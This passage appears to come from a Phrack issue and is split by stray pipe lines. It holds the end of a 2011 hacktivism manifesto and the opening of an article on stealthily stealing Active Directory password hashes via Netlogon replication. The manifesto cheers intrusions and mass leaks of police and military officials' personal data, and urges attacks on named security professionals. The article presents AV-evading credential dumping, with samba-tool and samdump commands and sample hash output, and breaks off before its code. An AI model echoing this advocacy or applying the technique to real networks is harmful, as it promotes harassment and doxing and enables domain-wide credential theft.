"express authority to conduct clandestine military activities in cyberspace
|
|
in support of military operations". Reuters reports that "the Pentagon has
|
|
put together a classified list of its offensive cyber capabilities so
|
|
policymakers know their option". To what extent the US has already engaged
|
|
in offensive electronic attacks is for the most part speculative. It is
|
|
widely speculated that the US or Israeli military, or both cooperating,
|
|
developed STUXNET to destroy Iran's nuclear facilities [2].
|
|
|
|
To fill the need for skilled security people, the military operates several
|
|
schools and training classes designed to turn young enlisted computer
|
|
enthusiasts into skilled hackers. The US Military Academy in West Point, NY
|
|
has an ACM SIGSAC chapter which teaches special classes on remote intrusion
|
|
techniques and periodically hosts several live hacking competitions to
|
|
"train and engage enlisted military, officer, or government-affiliated
|
|
civilians". Last April, the West Point team was victorious over "veteran
|
|
hackers from the NSA" at the 2011 Cyber Defense Exercise. Other military
|
|
hacker teams such as ddtek (as led by Lt. Cmdr Chris Eagle who regularly
|
|
speaks at DEFCON and Blackhat) also compete in civilian hacker tournaments
|
|
such as DEFCON's CTF, usually dominating the competition by bringing dozens
|
|
of Navy cybersecurity graduates [3][4]. No doubt many of these people will
|
|
eventually be working at USCYBERCOM or other clandestine military hacker
|
|
operations to launch attacks on behalf of the rich ruling class.
|
|
|
|
The US government must not have too much faith in their enlisted hackers,
|
|
because they collaborate with a variety of private companies and
|
|
individuals to defend their networks as well as profiling, infiltrating and
|
|
attacking their enemies. After LulzSec owned and leaked emails for the CEO
|
|
of military-contracted security firm Unveillance and Infragard member Karim
|
|
Hijazi, he was exposed to have been working with the DoD and the White
|
|
House to not only profile "main hacking groups in Libya and their
|
|
supporters" but also take the offensive and "map out Libya's Oil companies
|
|
and their SCADA system's vulnerabilities" [5]. Even after Karim was owned
|
|
and exposed he was willing to pay cash and offer his botnet to LulzSec to
|
|
destroy his competitors, further revealing the white hat's corrupt and
|
|
backstabbing nature as well as revealing how desperate and vulnerable the
|
|
most powerful military in the world really is.
|
|
|
|
Then there's Aaron Barr, the former CEO of HBGary Federal, who was served
|
|
with swift and fierce justice-- being exposed for engaging in
|
|
counter-intelligence operations attempting to disrupt both WikiLeaks (where
|
|
he suggests "cyber attacks against the infrastructure to get data on
|
|
document submitters") and Anonymous (where he cooperated with the FBI
|
|
attempting to profile "key leaders") [6]. The leaked emails also reveal a
|
|
bid to develop "persona management software" for the US military which is
|
|
another COINTELPRO-type tool to spread propaganda by creating an army of
|
|
fake twitter, facebook, blog, forum accounts to subvert democracy and
|
|
manipulate public opinion. Although Barr/HBGary and
|
|
Karim/Unveillance/Infragard have been exposed and humiliated, the
|
|
implications of what has been released involving their work demonstrate a
|
|
frightening and possibly illegal conspiracy between private security
|
|
corporations collaborating with government and military to silence and
|
|
disrupt their political opponents.
|
|
|
|
Despite the obvious failures of their affiliates, the military continues to
|
|
try to draw talent from independent hackers. DARPA made a public offering
|
|
to hackerspaces in the US to do "research designed to help give the U.S.
|
|
government tools needed to protect against cyberattacks". The program
|
|
Cyber-Insider (CINDER) is headed by Peiter "Mudge" Zatko [7] who-- like
|
|
many of us-- used to be a teenage hacker associated with the Cult of the
|
|
Dead Cow and old-school hacker space l0pht. Peiter eventually "went
|
|
straight" when they formed security consulting firm @Stake which was later
|
|
acquired by Symantec. Now he's completed the vicious circle from teenage
|
|
hacker to "security professional" to full blown military employment,
|
|
serving as an example to aspiring hackers as what NOT to do. Mudge has now
|
|
been speaking at hacker conferences like Schmoocon as well as various DARPA
|
|
Industry Day events in an attempt to recruit more hackers into the DARPA
|
|
fold. Hackerspaces, which are becoming a growing trend not only in the US
|
|
but also internationally, are often strapped for cash to pay rent or
|
|
purchase equipment, and because of unique problem-solving skills and a DIY
|
|
hacker ethic are being looked at by employers in both private and
|
|
government fields. Unfortunately, many hackerspaces are "non-political"
|
|
and are mostly composed of people more interested in a career than the
|
|
hacker ethic, making many especially vulnerable to pressure to do research
|
|
for the military or inform on other hackers to law enforcement.
|
|
|
|
Hackerspaces aren't unique for being wishy-washy and apathetic in this
|
|
regard: hackers in the US have a long history of big names going federal.
|
|
Adrian Lamo, once known as the "homeless hacker" after turning himself in
|
|
for breaking into several high profile news websites, is now universally
|
|
hated as the dirty snitch who turned in alleged WikiLeaks leaker Bradley
|
|
Manning. Despite this, Adrian still openly affiliates with 2600-- running
|
|
their facebook group, making occasional appearances on IRC, and most
|
|
recently being invited to speak on a panel at the 2010 HOPE convention.
|
|
Then there's Kevin Mitnick-- whose social engineering skills somehow
|
|
qualify him as some sort of spokesperson for hackers-- who has resigned
|
|
himself (like so many others) to the "industry" doing professional security
|
|
consulting and making big bucks giving speeches and signing books at
|
|
conferences (and like so many others he has become a target of black hats
|
|
who have repeatedly owned his servers and released his private emails and
|
|
passwords). Jeff "The Dark Tangent" Moss, who for more than a decade headed
|
|
the "largest underground hacking convention" DEFCON and the
|
|
grossly-misnamed Black Hat Briefings, ended up working for the Department of
|
|
Homeland Security. Then Oxblood Ruffin from the "underground" group Cult
|
|
of the Dead Cow (which was also owned hard by black hats) runs his mouth on
|
|
Twitter claiming "ownership" of the term "hacktivism" while repeatedly
|
|
denouncing other hackers (specifically "black hats" and "anonymous") who
|
|
break into and attack systems, going so far as to sign a joint statement by
|
|
cDc, 2600, l0pht, CCC and others condemning Legion Of The Underground's
|
|
attacks against the Iraqi government for human and civil rights abuses [8].
|
|
|
|
Another more recent example of treachery in the hacker community is the
|
|
case of 'security consultant' Thomas Ryan (aka frogman) who infiltrated and
|
|
released internal mailing list communications for the NYC Occupy Wallstreet
|
|
protesters. For months he worked his way in, gaining access and trust,
|
|
while at the same time forwarding protest plans to the FBI and several news
|
|
organizations, eventually dumping everything to right-winger Andrew
|
|
Breitbart's website as "proof" of "illegal anarchist activities". In the
|
|
same files he released he accidentally included his own correspondence with
|
|
the FBI and news organizations (some "security professional"). Thomas
|
|
Ryan's white hat and right-wing leanings were rather well known in hacker
|
|
circles, as well as his social engineering exploits (he previously spoke at
|
|
the "black hat briefings" about his experiences tricking dozens of
|
|
government employees and security cleared professionals by using a fake
|
|
profile of an attractive and skilled woman named "Robin Sage":
|
|
unfortunately he did not dump any private or embarrassing information on his
|
|
white hat brethren). Certainly the primary point of failure for OWS was
|
|
poor security culture, trusting an already well-known reactionary white hat
|
|
to their internal communications and protest details (a weakness of an
|
|
open-source movement as opposed to closed private collectives composed of
|
|
vouched-in members). However when this betrayal falls from our own hacker
|
|
tree, we need to take responsibility and discourage future treachery (like
|
|
how Aaron Barr was served by Anonymous).
|
|
|
|
Then there's 2600 which is composed of several separate communities
|
|
including the local meetups, the magazine, Off The Hook, and the IRC
|
|
community. To be fair, Eric Corley is somewhat friendly to the interests of
|
|
hackers, supporting digital rights, criticizing the police state, and being
|
|
generally left-leaning. But upon closer inspection you'll find a very
|
|
disturbing militaristic anti-wikileaks, anti-EFF and straight up
|
|
anti-hacker mentality held by many of the people involved: half the ops on
|
|
2600net have no problem openly bragging about working for the military or
|
|
collaborating with law enforcement. Just like ten years ago in their
|
|
condemnation of LoU, 2600 released a statement in December condemning
|
|
Anonymous ddos attacks against the banks and credit card corporations that
|
|
were ripping off WikiLeaks [9] (a tactic that is nothing more than a
|
|
digital version of a sit-in, a respected tradition of civil disobedience in
|
|
US politics). Using the 2600 name to condemn Anonymous actions not only
|
|
undermines our work but creates the false impression that the hacker
|
|
community does not support actions against PayPal in support of Wikileaks.
|
|
More than six months later, the FBI carried out raids at the homes of
|
|
several dozen alleged Anonymous "members" who were purportedly involved
|
|
with carrying out the LOIC attacks against PayPal. In light of how dozens
|
|
of people (who may not even have been involved at all) may be facing
|
|
decades in prison for some bogus, trumped-up federal conspiracy charges,
|
|
what kind of credibility should be given to 2600 who clearly has no regard
|
|
for practicing solidarity with hackers facing unjust persecution?
|
|
|
|
The 2600net IRC network itself is run by a DoD-cleared, Infragard-trained
|
|
"r0d3nt" named Andrew Strutt who works for a military-contracted company
|
|
and has in the past openly admitted to working with law enforcement to bust
|
|
people he claims were running botnets and distributing child porn. Andrew
|
|
Strutt's interview for GovExec.com [10] read: "'I've had to work hard to
|
|
build up trust,' Strutt adds that he doesn't disclose his identity as a
|
|
hacker to the people he refers to as his handlers. And he doesn't advertise
|
|
to hackers that he works for the .mil or .gov community either". Most
|
|
recently, r0d3nt voluntarily complied with a grand jury subpoena where he
|
|
gave up the shell server "pinky" to the feds and kept quiet about it for
|
|
months [11]. The shell server had several hundred accounts from other
|
|
members of the 2600 community who now have the displeasure of knowing that
|
|
law enforcement forensics are going through all their files and
|
|
.bash_history logs. Strutt kept this a secret from everybody for months
|
|
(complying with a clearly illegal "gag order") and has since been very
|
|
vague about details, refusing to answer questions as to the specifics of
|
|
the investigation except that law enforcement was looking for "a certain
|
|
user"'s activity on the box. Of course it is reckless and stupid to use a
|
|
community shell server to carry out attacks putting other users on the box
|
|
in danger, but this is something you should be prepared for well ahead of
|
|
time if you put yourself in such a place. Many ISPs that host websites and
|
|
listservs for radicals and hackers not only have a clearly defined privacy
|
|
policy reducing the amount of personally identifiable information on the
|
|
box, but also have a "will not comply" statement that says they will never
|
|
voluntarily give up the box. This was demonstrated in November 2009 when
|
|
IndyMedia.us received a similar gag order and subpoena asking for log files
|
|
on the server (which never existed in the first place). The folks there
|
|
immediately got the EFF involved and publicly announced the government's
|
|
unjust fishing expedition, saying they had no plans on complying. In the
|
|
end, nothing was given up and the gag order was found to be
|
|
unconstitutional [12].
|
|
|
|
Why do many of the big name hackers that are seen as role models end up
|
|
being feds and corporate sellouts, and why are these people still welcomed
|
|
and tolerated in the scene? Eric Corley of 2600 estimated that a quarter of
|
|
hackers in the US are FBI informants [13], which is unfortunately an
|
|
astonishingly high figure compared to other fields. Experienced criminals
|
|
who have done prison time will tell you that the code of the street is
|
|
don't trust anybody and don't rat. If you ask many younger hackers,
|
|
they'll casually joke about breaking into systems in their youth but if
|
|
they ever grow up or get busted they'll be working for the government.
|
|
Dealing with the devil never ends up well for anyone involved: all they
|
|
want to do is bust other hackers, and in the end after using and abusing
|
|
their informants they often kick them to the curb.
|
|
|
|
Albert Gonzales (aka "soupnazi", "cumbajohnny", and "segvec") became an
|
|
informant after he was busted in NYC for credit card fraud and was paid
|
|
$75,000 to infiltrate carding websites like ShadowCrew. Despite his
|
|
cooperation with the Secret Service where he sent several dozen hackers and
|
|
fraudsters to prison as part of Operation Firewall, the feds STILL indicted
|
|
Gonzales on some fresh credit card fraud charges of his own and sent his
|
|
rat ass away for several decades. Unfortunately one of the people roped
|
|
into Gonzales' web of deception was the notorious black hat Stephen Watt
|
|
"the unix terrorist" who helped write old school zines like el8 and left a
|
|
trail of mail spools, ownage logs, and rm'd servers of the most respected
|
|
"security professionals" in the industry. Watt was never even charged with
|
|
participating in any of Gonzales' money schemes but simply wrote some
|
|
common packet sniffing code called 'blabla' which was supposedly used to
|
|
help intercept credit card transactions in TJX's networks, demonstrating
|
|
how depraved and desperate the feds are to make quotas and inflate the
|
|
threat of hacker fraud artists in the media [14].
|
|
|
|
While many support our fallen hacker comrades like the Unix Terrorist, we
|
|
still hear a startling line of thought coming out of the infosec community.
|
|
Ask around at your 2600 meeting or hackerspace and you'll hear a
|
|
condemnation of imprisoned hackers as being nothing more than criminals
|
|
along with a monologue echoing that of politicians, police officers and the
|
|
media: don't break into other people's systems, don't ddos, don't drop dox
|
|
and if you find a vulnerability, "please please report it to the vendor so
|
|
it could be patched." To think this mentality is being perpetuated by
|
|
people who wave the hacker flag is disgusting and undermines the work that
|
|
many legit hackers have fought and gone to prison for.
|
|
|
|
Because so many who claim to represent hackers end up working for the very
|
|
corrupt and oppressive institutions that other hackers are fighting
|
|
against, it is time to draw lines in the sand. If you are military, law
|
|
enforcement or informant, work for a DOD contracted company or a private
|
|
security firm hired to bust other hackers or protect the infrastructure we
|
|
aim to destroy, you are no comrade of ours. This is 2011, the year of leaks
|
|
and revolutions, and every day we hear about riots around the world, and
|
|
how major corporations and government systems are getting owned by hackers.
|
|
The papers have been describing recent events as a "cyberwar" (or more
|
|
accurately, a "hacker class war") and the way the attacks have become more
|
|
frequent and more damaging, this is not much of an exaggeration.
|
|
|
|
It is impossible to talk about contemporary hacktivism without mentioning
|
|
Anonymous, LulzSec and Antisec. Responsible for dramatically raising the
|
|
stakes of this "war," they have adopted an increasingly explicit
|
|
anti-government and anti-capitalist stance. The decentralized model in
|
|
which Anonymous operates parallels every successful guerrilla warfare
|
|
campaign waged throughout revolutionary history. In just a few months, they
|
|
have taken aim at the CIA, the United States Senate, Infragard, Sony, NATO,
|
|
AT&T, Viacom, Universal, IRCFederal, Booz Allen, Vanguard Defense
|
|
Industries, as well as Texas, Missouri, Alabama, Arizona, Boston, and other
|
|
police departments -- dropping massive username/password lists,
|
|
confidential law enforcement documents, personal email correspondence and
|
|
more. The latest campaign -- "Operation Antisecurity" -- is designed to
|
|
unite other hacker groups, tipping their hats to old school antisec days
|
|
while bringing more attention to anti-government black hat politics as has
|
|
never been seen before [15]. Although the attack methods being utilized have
|
|
been relatively primitive-- ranging from common web application
|
|
vulnerabilities like RFI/LFI and SQL injection, to brute force DDOS and
|
|
botnet attacks-- there are signs that their attack methodology is becoming
|
|
more sophisticated, especially as talent from allied hacker crews becomes
|
|
involved. Additionally, their choice of targets goes after our bigger
|
|
enemies: while past incarnations of antisec have humiliated many well-known
|
|
sellouts in the computer security industry, today's blackhats are not
|
|
scared to hit higher profile figures in law enforcement, military, and
|
|
governments, most notably by mercilessly dropping usernames, passwords, home
|
|
addresses, phone numbers, and social security numbers of tens of thousands of
|
|
police and military officials.
|
|
|
|
As hackers continue to expose and attack corruption, law enforcement will
|
|
desperately continue to try to make high-profile arrests regardless of
|
|
actual guilt or association. Especially as politicians continue to try to
|
|
classify hacktivism as an act of cyber-terrorism (which can be retaliated
|
|
against as traditional acts of war [16]), the threat of prison is very real
|
|
and people should be well prepared ahead of time for all possible
|
|
repercussions for their involvement. We should not, however, let the fear
|
|
of government repression scare us into not taking action; instead, we
|
|
should strengthen our movement by practicing better security culture and
|
|
working to support other hackers who get busted in the line of duty. Even
|
|
though there are plenty of guides out there on how to become "anonymous",
|
|
many mistakes have already been made: trusting the mentally unstable 19
|
|
year old Ryan Cleary to run the LulzSec IRC server, for example. Even
|
|
before he was actively cooperating with the feds after being arrested in a
|
|
joint US-UK operation, Ryan was already known to double-cross other
|
|
hackers, having posted IP information of hundreds of anonops IRC users
|
|
[17][18]. Although it's righteous to out snitches and movement traitors to
|
|
the public, doxing other hackers involved in the struggle is only making
|
|
law enforcement's job easier to identify and prosecute our comrades. Now
|
|
more than ever should folks unite and practice solidarity with each other,
|
|
setting aside our differences to go after our common enemies.
|
|
|
|
The events over the past few months have been compared to the glory days of
|
|
the 90s, complete with IRC wars and major website defacements. As breaking
|
|
into computer systems becomes popularized and a new batch of young bloods
|
|
are emerging on the scene, many questions remain. Is government going to
|
|
make more arrests and pass more draconian laws? Would they be doing the
|
|
same thing anyway-- even if hackers weren't striking back? Is Anonymous
|
|
actually damaging the white-hat military and intelligence security
|
|
industries with the ownings, defacements, and leaks, or are they just
|
|
bringing heat on the underground while providing justification for more
|
|
government financing of our enemies? Is this just another script kiddie
|
|
scene thriving on sqlmap and milw0rm exploits or is there old school talent
|
|
behind the scenes owning shit to keep the antisec flame alive? Most
|
|
importantly, how can those fighting the hacker class war better coordinate
|
|
their work with street-level resistance movements?
|
|
|
|
As attacks intensify, no doubt governments will try to put more money into
|
|
defending their infrastructure, holding more internal security trainings,
|
|
and passing more laws increasing penalties for computer hacking as well as
|
|
censoring and invading our privacy. The government propaganda machine will
|
|
no doubt blame hackers as some sort of cyber-Al Qaeda to demonstrate the
|
|
need for heightened security. Don't get it twisted: they have always wanted
|
|
to pass these laws in the first place and would have done so with or
|
|
without using the hacker threat as scapegoat, just as they wanted to go
|
|
invade Afghanistan and Iraq and pass the PATRIOT Act before 9/11 ever
|
|
happened. Don't be scared by ridiculous statements like FBI deputy
|
|
assistant Steven Chabinsky, who announced regarding the Anonymous PayPal
|
|
arrests, "We want to send a message that chaos on the Internet is
|
|
unacceptable, [even if] hackers can be believed to have social causes, it's
|
|
entirely unacceptable to break into websites and commit unlawful acts".
|
|
Yes, the feds will continue to paint us as terrorists whether we act or not
|
|
and will continue to make sweeping arrests regardless of guilt or innocence
|
|
in an attempt to demonstrate that they aren't losing the cyberwar after all
|
|
when all signs show that they are. It's widely speculated that the
|
|
unexpected resignation of US-CERT director Randy Vickers is related to the
|
|
dramatic increase in high-profile internet attacks against government
|
|
institutions [19].
|
|
|
|
Another sign of success is how the threat of being targeted by Anonymous
|
|
and other anti-censorship activists could possibly scare the companies into
|
|
not going forward with their plans, which is exactly what happened to
|
|
Australian ISP Telstra [20]. A practice that seems to have been revived
|
|
from old school black hat days is the targeting of security professionals
|
|
and hackers who choose to sell out and work for corporations and
|
|
governments to protect their systems. This is an effective strategy
|
|
because not only are they ridiculously incompetent and corrupt low-hanging
|
|
fruit, but they likely hold private information on the cyberwar activities
|
|
of the military. Additionally, hitting them hard and repeatedly will serve
|
|
as a warning to others who would follow their lead and sell out their
|
|
skills to the enemy: think twice before you find yourself in the
|
|
crosshairs. What would happen if the government invested all this money to
|
|
hire more hackers to protect their systems, but no one showed up?
|
|
|
|
Hackers may brag about their antics instantly getting international news
|
|
coverage but the offensive cyber operations of the US military are
|
|
considerably quieter. Not only does this keep their enemies from knowing
|
|
their capabilities, but much of the work being done is also likely
|
|
illegal. As the saying goes, those who make the laws are allowed to break
|
|
them. When teenagers hack into high profile systems, they're considered
|
|
criminals and even terrorists; the governments and militaries of the world
|
|
do the same at greater magnitudes while hiding behind the guises of
|
|
national security or "spreading democracy." It might be a while before we
|
|
ever hear about some of the operations hackers working for the military are
|
|
involved in. Then again, it might not-- maybe they'll be the next ones
|
|
owned, having their private data plastered all over the Internet.
|
|
|
|
---
|
|
|
|
[1] "President lays out cyberwar guidelines, report says"
|
|
http://news.cnet.com/8301-13506_3-20073314-17/president-lays-out-cyberwar-
|
|
guidelines-report-says/
|
|
|
|
[2] "Stuxnet apparently as effective as a military strike"
|
|
http://arstechnica.com/tech-policy/news/2010/12/stuxnet-apparently-as-
|
|
effective-as-a-military-strike.ars
|
|
|
|
[3] "Eagle Soars to Top of NPS"
|
|
http://www.navy.mil/search/display.asp?story_id=2886
|
|
|
|
[4] "Poke in the Eye to SANS and CISSPs in Defcon 18 CTF Announcement"
|
|
http://sharpesecurity.blogspot.com/2010/04/poke-in-eye-to-sans-and-cissps-
|
|
in.html
|
|
|
|
[5] "Fuck FBI Friday Pretentious Press Statement"
|
|
http://LulzSecurity.com/releases/fuck_fbi_friday_
|
|
PRETENTIOUS%20PRESS%20STATEMENT.txt
|
|
|
|
[6] "How One Man Tracked Down Anonymous And Paid a Heavy Price"
|
|
http://www.wired.com/threatlevel/2011/02/anonymous/all/1
|
|
|
|
[7] "Hacker 'Mudge' Gets DARPA Job"
|
|
http://news.cnet.com/8301-27080_3-10450552-245.html
|
|
|
|
[8] "Joint Statement Condemning LOU Cyberwar"
|
|
http://www.2600.com/news/view/article/361
|
|
|
|
[9] "Press Release - 2600 Magazine Condemns Denial of Service Attacks"
|
|
http://www.2600.com/news/view/article/12037
|
|
|
|
[10] "Hiring Hackers"
|
|
http://www.govexec.com/features/1110-01/1110-01s1.htm
|
|
|
|
[11] "Statement regarding Seizure of pinky.ratman.org shell server."
|
|
http://foster.stonedcoder.org/~r0d3nt/statement.txt
|
|
|
|
[12] "From EFF's Secret Files: Anatomy of a Bogus Subpoena"
|
|
https://www.eff.org/wp/anatomy-bogus-subpoena-indymedia
|
|
|
|
[13] "One in Four Hackers in the U.S. is an FBI Informant"
|
|
http://publicintelligence.net/one-in-four-hackers-in-the-u-s-is-an-fbi-
|
|
informant
|
|
|
|
[14] "TJX Hacker Was Awash in Cash; His Penniless Coder Faces Prison"
|
|
http://www.wired.com/threatlevel/2009/06/watt/
|
|
|
|
[15] "50 Days of Mayhem: How LulzSec Changed Hacktivism Forever"
|
|
http://www.pcmag.com/article2/0,2817,2387716,00.asp
|
|
|
|
[16] "Pentagon to Consider Cyberattacks Acts of War"
|
|
http://www.nytimes.com/2011/06/01/us/politics/01cyber.html
|
|
|
|
[17] "Teenage 'Cyber Hacker' Son is Accused of Bringing Down 'British FBI'
|
|
Site"
|
|
http://www.dailymail.co.uk/news/article-2007345/Ryan-Cleary-Hacker-accused-
|
|
bringing-British-FBI-site.html
|
|
|
|
[18] "LOL ANONOPS DEAD"
|
|
https://sites.google.com/site/lolanonopsdead/
|
|
|
|
[19]"Agency Chief Tasked With Protecting Government Networks From Cyber
|
|
Attacks Resigns"
|
|
http://www.huffingtonpost.com/2011/07/25/chief-protecting-government-
|
|
networks-resigns_n_909116.html
|
|
|
|
[20] "Anonymous and LulzSecs Existence Scares ISP into Halting Web
|
|
Censorship"
|
|
http://www.zeropaid.com/news/93950/anonymous-and-LulzSecs-existence-scares-
|
|
isp-into-halting-web-censorship/
|
|
|
|
[21] "FBI Director Mueller Explains FBI Priorities 10 Years after 9/11"
|
|
http://theiacpblog.org/2011/10/25/fbi-director-mueller-explains-fbi-
|
|
priorities-10-years-after-911/
|
|
|
|
[ EOF ]
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x11 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-----=[ Abusing Netlogon to steal an Active Directory's secrets ]=-----=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-----------------------=[ by the p1ckp0ck3t ]=-----------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------=[ anonymous_7406da@phrack.org ]=-------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
<<<->>>
|
|
|
|
+ Prologue
|
|
+ Common tools & appropriate warnings!
|
|
+ Meet the Samba 4 project
|
|
+ Digging into the Netlogon replication mechanism
|
|
+ Extracting the secrets
|
|
+ A practical introduction to S4 (Stealth & Secure Secret Stealer)
|
|
+ S4 .VS. Windows 2008 Domain Controllers
|
|
+ Additional details
|
|
+ Last words
|
|
+ Bibliography
|
|
+ c0de: S4
|
|
|
|
<<<->>>
|
|
|
|
|
|
---[ 1 - Prologue
|
|
|
|
|
|
If you've been hacking around Windows networks then you must be more than
|
|
familiar with common LSA dumping tools such as pwdump [01] & co. You must
|
|
also know that they are not only detected by (most?) AV, but furthermore
|
|
that they may not work the expected way when an AV/HIPS is installed on
|
|
your target. In the worst case a box may even crash! It's fucking annoying.
|
|
|
|
In a Windows network, crashing a workstation is probably harmless (natural
|
|
Windows behavior you could say) because administrators won't notice and its
|
|
user will only complain. He may also kick the box, blame "fucking M$" and
|
|
ultimately reboot it. But in the end, we all know that he will rather focus
|
|
on the recovery of his Office document than look for evidence (assuming he
|
|
has the required skills to begin with). The situation is entirely different
|
|
when it comes to Windows servers and especially DC (Domain Controllers).
|
|
For these kinds of target, one needs to be *very* cautious because an
|
|
administrator would find a crash *very* suspicious.
|
|
|
|
This paper presents a (hopefully) new technique to retrieve the AD (Active
|
|
Directory [02])'s secrets using one of its (natural) replication mechanisms
|
|
when a DC or a domain administrator's account has been compromised. Because
|
|
it's solely based on the Windows API -without any hooks or (too) dirty
|
|
tricks- it's a quite efficient way to retrieve domain users' hashed
|
|
passwords.
|
|
|
|
|
|
---[ 2 - Common tools & appropriate warnings!
|
|
|
|
|
|
Let me begin with a bit of bitching regarding what's already available
|
|
out there. There are a lot of tools dealing with "online" password dumping,
|
|
most being open source, a few of them being however commercial software (I
|
|
haven't tested those). Judging from my experience (and that of many
|
|
friends) I can tell you that only a few of them are *really* of interest. I
|
|
won't file a bug report -:]- but remember that a good password dumping tool
|
|
should provide:
|
|
|
|
1. Stability: Using such a tool should *never* be risky for the target's
|
|
safety. Interactions with LSASS are really intrusive and
|
|
dangerous and should be avoided if possible. You wouldn't
|
|
use a kernel sploit without having first understood how
|
|
and why it's working right? Same thing here. Crashing
|
|
LSASS means crashing the box!
|
|
|
|
2. Stealthiness: You should never take the risk of being caught by some
|
|
AV/HIPS. It's no news that there are Windows APIs that you
|
|
can't use anymore and it's obvious that binaries provided
|
|
by a famous security website have a good chance to be
|
|
detected.
|
|
|
|
Take for example the case of fgdump & gsecdump. Both are great tools with a
|
|
very good chance to succeed. But, can you seriously trust software that:
|
|
|
|
- Hook well known LSASS functions (using even more known techniques)?
|
|
(pwdump6 of fgdump)
|
|
- Parse internal LSASS memory? (gsecdump)
|
|
- Write well known (=> detected) dll & exe files on disk? (fgdump)
|
|
- Start new services? Stop AV services? (fgdump)
|
|
- Are closed source? (gsecdump)
|
|
|
|
Especially with poorly designed AV/HIPS running on the same machine? Don't
|
|
get me wrong, I'm not dissing pwdump* (or similar) tools, especially
|
|
since they are necessary; but at least patch them a bit, you moron! In the
|
|
case of a workstation target, there are no other public alternatives. But
|
|
there's another story in the case of a DC target. What can be done in this
|
|
matter?
|
|
|
|
Let me tell you the story that months later would lead me to this paper.
|
|
Because it's a story, some details are missing, especially in the reverse
|
|
engineering work performed. The idea is to keep the paper simple, as well
|
|
as to give you the opportunity to find the last pieces of the puzzle all by
|
|
yourself; follow the hints, hacker :]
|
|
|
|
|
|
---[ 3 - Meet the spart^wSamba 4 project
|
|
|
|
|
|
Unix people are well aware of the Samba project but only a few of them are
|
|
truly aware of how incredible this project really is. This is not just
|
|
about mounting CIFS volumes, but a complete reverse engineering/rewrite of
|
|
several parts of Windows. Kudos to the Samba team.
|
|
|
|
A few years ago, the Samba team decided to start a new branch of their
|
|
project: Samba 4 [03]. The goal was to provide an even deeper integration
|
|
of a Samba server inside an Active Directory. Now with Samba 4, a Unix
|
|
computer can become a (RO)DC and what's even more incredible is that it's
|
|
as easy (well if you're lucky) as typing:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
# samba-tool join FOO.BAR DC -Uadministrator@foo.bar --realm=FOO.BAR
|
|
---------------------------------------------------------------------------
|
|
|
|
This command (dc)promotes our Linux box in the AD (in this case the domain
|
|
is foo.bar). It's easy to check that it's indeed properly registered as a
|
|
legitimate DC using for example an LDAP query:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
$ ldapsearch -x -LLL -h dc1.foo.bar -D "administrator@foo.bar" -W -b
|
|
"OU=Domain Controllers,dc=foo,dc=bar" "(objectClass=Computer)" cn
|
|
Enter LDAP Password: *******
|
|
dn: CN=DC1,OU=Domain Controllers,DC=foo,DC=bar
|
|
cn: DC1 <-- first DC
|
|
|
|
dn: CN=MEDIA,OU=Domain Controllers,DC=foo,DC=bar
|
|
cn: MEDIA <-- second DC = our proud little Linux
|
|
---------------------------------------------------------------------------
|
|
|
|
As all traditional DC functions are properly running, Kerberos services are
|
|
running as well to authenticate domain users whenever it is required:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
# samba-tool samdump
|
|
[...]
|
|
Administrator:500:BAC14D04669EE1D1AAD3B435B51404EE:\
|
|
FBBF55D0EF0E34D39593F55C5F2CA5F2:[UX]:LCT-4F1B2611
|
|
Guest:501:NO PASSWORDXXXXXXXXXXXXXXXXXXXXX:\
|
|
NO PASSWORDXXXXXXXXXXXXXXXXXXXXX:[NDUX]:LCT-00000000
|
|
krbtgt:502:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
|
|
D25E142705B3C1B9122309D194E0B36F:[DU]:LCT-4F1B1EFC
|
|
SUPPORT_388945a0:1001:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
|
|
4CB5D040611B3FF00F17AF7DC344F97C:[DUX]:LCT-4F1B196F
|
|
DC1$:1003:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
|
|
A59B7CDD1167816DFDD8C5F310ACCEC0:[S]:LCT-4F1B1F2F
|
|
tofu:1117:E91851A7E394D006ABD3B435B31404EE:\
|
|
15221599C25FA333EA6044C0513ADD45:[UX]:LCT-4F1B23FB
|
|
HAXOR$:1120:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
|
|
88369D133A118783D46D1C6344E99B08:[W]:LCT-4F1B366B
|
|
cheese:1121:BC5F4D08D49A0099AAD3B43CB51404EE:\
|
|
3E21E05DD9E4E790CB3783D9292F80F7:[UX]:LCT-4F1BE1F2
|
|
MEDIA$:1122:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
|
|
72CCE806701E837DCBB33B29A9D48E97:[S]:LCT-4F1C3AB1
|
|
[...]
|
|
---------------------------------------------------------------------------
|
|
|
|
When I discovered how mature the Samba 4 project had become and what it
|
|
allowed me to perform, I started to imagine how I could take advantage of
|
|
the situation. The first idea I came up with was to introduce a temporary
|
|
Samba 4 DC in the AD infrastructure, dump the passwords and immediately
|
|
dcpromote it again (=remove it from the AD). However this idea is really
|
|
bad regarding the criteria that I gave earlier:
|
|
|
|
- Stability: No matter how functional Samba 4 may appear, it's many
|
|
years too soon to use it for serious purpose. To give you an example,
|
|
I destroyed many testing environments as I was playing with Samba 4
|
|
(merely using it in fact).
|
|
|
|
- Stealthiness: I doubt there is even one person able to tell us how
|
|
many modifications the introduction of a new DC would bring in the
|
|
AD. Do you honestly think that you could introduce a DC, make it
|
|
disappear and that no administrator would ever be able to tell that
|
|
it was there? I'm not taking the risk and neither should you.
|
|
|
|
For these two reasons, it was wise to give up (interestingly, as I would be
|
|
told later, some French guy apparently didn't [04]).
|
|
|
|
At this point, I had no more ideas until I realized that network traffic
|
|
was exchanged between DC1 (another DC from the domain) and MEDIA when I was
|
|
typing the samdump command. More precisely, and thanks to Wireshark's
|
|
dissectors (courtesy of the Samba team), I was able to observe the
|
|
following events:
|
|
|
|
1. NTLM Authentication Protocol used to authenticate MEDIA
|
|
2. MEDIA binding on \\DC3.FOO.BAR\IPC$\lsarpc and calling
|
|
-> lsa_OpenPolicy2() (opnum 44)
|
